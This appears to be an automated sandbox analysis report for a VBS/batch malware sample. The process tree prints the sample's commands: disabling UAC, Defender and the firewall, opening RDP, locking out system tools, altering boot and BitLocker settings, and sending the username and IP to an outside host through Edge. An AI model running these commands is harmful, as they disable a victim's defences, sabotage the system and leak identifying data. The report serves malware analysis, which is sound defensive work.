Analysis
max time kernel: 159s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 15:54

Static task: static1
Behavioral task: behavioral1
  Sample: malware.vbs
  Resource: win7-20240419-en
Behavioral task: behavioral2
  Sample: malware.vbs
  Resource: win10v2004-20240426-en

General
Target: malware.vbs
Size: 6KB
MD5: e0776095121712202c80802058348633
SHA1: 6915df50e7944d289d789085428fd73ba01c6653
SHA256: 8d1cee07b1f4153c602c7af67f13391da300cc488e69b59279b1a8d75106d864
SHA512: 7aaf8b33a91da07a62f9491c50c4637e9f1fee83d76ef3df9dc6843f1448457a93f892a1a1d93566aea2d08e9abcbfa25a943b52984f8669949eb2509d8ce1a6
SSDEEP: 96:qD2WSNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/Mom2i:qD8qrZgX7yrCdPidfbUG2i
Malware Config
Signatures
UAC bypass 2 IoCs
Processes:
  reg.exe  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  reg.exe  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
Processes (pid, process):
  5172 bcdedit.exe
  5348 bcdedit.exe
  5820 bcdedit.exe
  4808 bcdedit.exe
  5148 bcdedit.exe
  5880 bcdedit.exe
  5872 bcdedit.exe
  1904 bcdedit.exe
Creates new service(s) 2 TTPs
Disables RegEdit via registry modification 1 IoCs
Processes:
  reg.exe  Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
Disables Task Manager via registry modification
Modifies Windows Firewall 2 TTPs 20 IoCs
Possible privilege escalation attempt 12 IoCs
Modifies file permissions 1 TTPs 12 IoCs
Drops file in System32 directory 25 IoCs
Drops file in Windows directory 1 IoCs
Processes:
  netsh.exe  File created C:\Windows\rescache\_merged\431186354\3919016826.pri
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
  3912 sc.exe
  5672 sc.exe
  5232 sc.exe
  708 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
  msedge.exe  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
  msedge.exe  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  msedge.exe  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  msedge.exe  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
  msedge.exe  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  msedge.exe  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes (pid, process):
  3672 ipconfig.exe
  5644 ipconfig.exe
  5532 ipconfig.exe
  4200 ipconfig.exe
Modifies data under HKEY_USERS 64 IoCs
Opens file in notepad (likely ransom note) 1 IoCs
Processes (pid, process):
  2816 Notepad.exe
Runs .reg file with regedit 1 IoCs
Processes (pid, process):
  5372 regedit.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
Suspicious use of AdjustPrivilegeToken 42 IoCs
Suspicious use of FindShellTrayWindow 52 IoCs
Suspicious use of SendNotifyMessage 48 IoCs
Suspicious use of SetWindowsHookEx 6 IoCs
Processes (pid, process):
  5936 OpenWith.exe
  5732 OpenWith.exe
  4192 OpenWith.exe
  5844 OpenWith.exe
  2336 OpenWith.exe
  2444 OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵PID:3672
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:208
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\malware.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4580
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456 -
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
PID:2504 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
PID:1488 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
PID:4228 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
PID:2720 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:4728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵PID:5100
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵PID:708
-
  C:\Windows\system32\reg.exe (PID 2644)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2096)
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f
  C:\Windows\system32\reg.exe (PID 2396)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f
  C:\Windows\system32\reg.exe (PID 1588)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
  C:\Windows\system32\reg.exe (PID 4396)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
  C:\Windows\system32\reg.exe (PID 3832)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
  C:\Windows\system32\reg.exe (PID 4452)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
  C:\Windows\system32\reg.exe (PID 3520)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass
  C:\Windows\system32\reg.exe (PID 2440)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 3216)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 1260)
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
  C:\Windows\system32\reg.exe (PID 4400)
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
  C:\Windows\system32\reg.exe (PID 2476)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2344)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 1652)
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 3852)
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 4496)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2000)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 2780)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 780)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 1972)
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
  C:\Windows\system32\reg.exe (PID 3540)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 4500)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
  C:\Windows\system32\reg.exe (PID 1360)
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
  C:\Windows\system32\reg.exe (PID 4916)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Disables RegEdit via registry modification
  C:\Windows\system32\cmd.exe (PID 2744)
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    C:\Windows\system32\ipconfig.exe (PID 3672)
      ipconfig
      - Gathers network information
    C:\Windows\system32\findstr.exe (PID 5004)
      findstr IPv4
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4988)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.216
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2724)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x40,0x128,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3136)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4044)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2816)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3540)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2336)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5348)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5492)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5500)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5508)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5792)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5800)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5196)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5304)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5620)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  C:\Windows\system32\cmd.exe (PID 5028)
    C:\Windows\system32\cmd.exe /c whoami
    C:\Windows\system32\whoami.exe (PID 4956)
      whoami
      - Suspicious use of AdjustPrivilegeToken
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6128)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1360)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5188)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3116)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
  C:\Windows\system32\cmd.exe (PID 5280)
    C:\Windows\system32\cmd.exe /c net user "Admin"
    C:\Windows\system32\net.exe (PID 5312)
      net user "Admin"
      C:\Windows\system32\net1.exe (PID 1968)
        C:\Windows\system32\net1 user "Admin"
  C:\Windows\system32\takeown.exe (PID 5344)
    takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\icacls.exe (PID 5444)
    icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions
  C:\Windows\system32\manage-bde.exe (PID 5132)
    manage-bde -off C:
  C:\Windows\system32\manage-bde.exe (PID 5160)
    manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
  C:\Windows\system32\bcdedit.exe (PID 5172)
    bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\bcdedit.exe (PID 5348)
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\sc.exe (PID 3912)
    sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe
  C:\Windows\system32\net.exe (PID 4976)
    net start MiServicio
    C:\Windows\system32\net1.exe (PID 2068)
      C:\Windows\system32\net1 start MiServicio
  C:\Windows\system32\takeown.exe (PID 2708)
    takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\icacls.exe (PID 5344)
    icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions
  C:\Windows\system32\cmd.exe (PID 5296)
    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
    C:\Windows\system32\reg.exe (PID 4140)
      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
    C:\Windows\system32\find.exe (PID 5412)
      find "BackupProductKeyDefault"
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2040)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2768)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
C:\Windows\System32\CompPkgSrv.exe (PID 4140)
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe (PID 1900)
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\cmd.exe (PID 4752)
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
  - Modifies data under HKEY_USERS
  C:\Windows\system32\net.exe (PID 4148)
    net session
    C:\Windows\system32\net1.exe (PID 5624)
      C:\Windows\system32\net1 session
  C:\Windows\system32\powercfg.exe (PID 5648)
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 5684)
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 444)
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\powercfg.exe (PID 6028)
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\netsh.exe (PID 6016)
    netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 6068)
    netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 2440)
    netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall
  C:\Windows\system32\netsh.exe (PID 5308)
    netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
  C:\Windows\system32\netsh.exe (PID 5136)
    netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall
  C:\Windows\system32\reg.exe (PID 2912)
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  C:\Windows\system32\reg.exe (PID 5616)
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5636)
    REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
  C:\Windows\system32\reg.exe (PID 5688)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 1916)
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 3328)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 5736)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 6080)
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 2444)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
  C:\Windows\system32\reg.exe (PID 4140)
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
  C:\Windows\system32\reg.exe (PID 4200)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass
  C:\Windows\system32\reg.exe (PID 5284)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  C:\Windows\system32\reg.exe (PID 5352)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 5600)
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
    - Modifies data under HKEY_USERS
  C:\Windows\system32\reg.exe (PID 5592)
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
    - Modifies data under HKEY_USERS
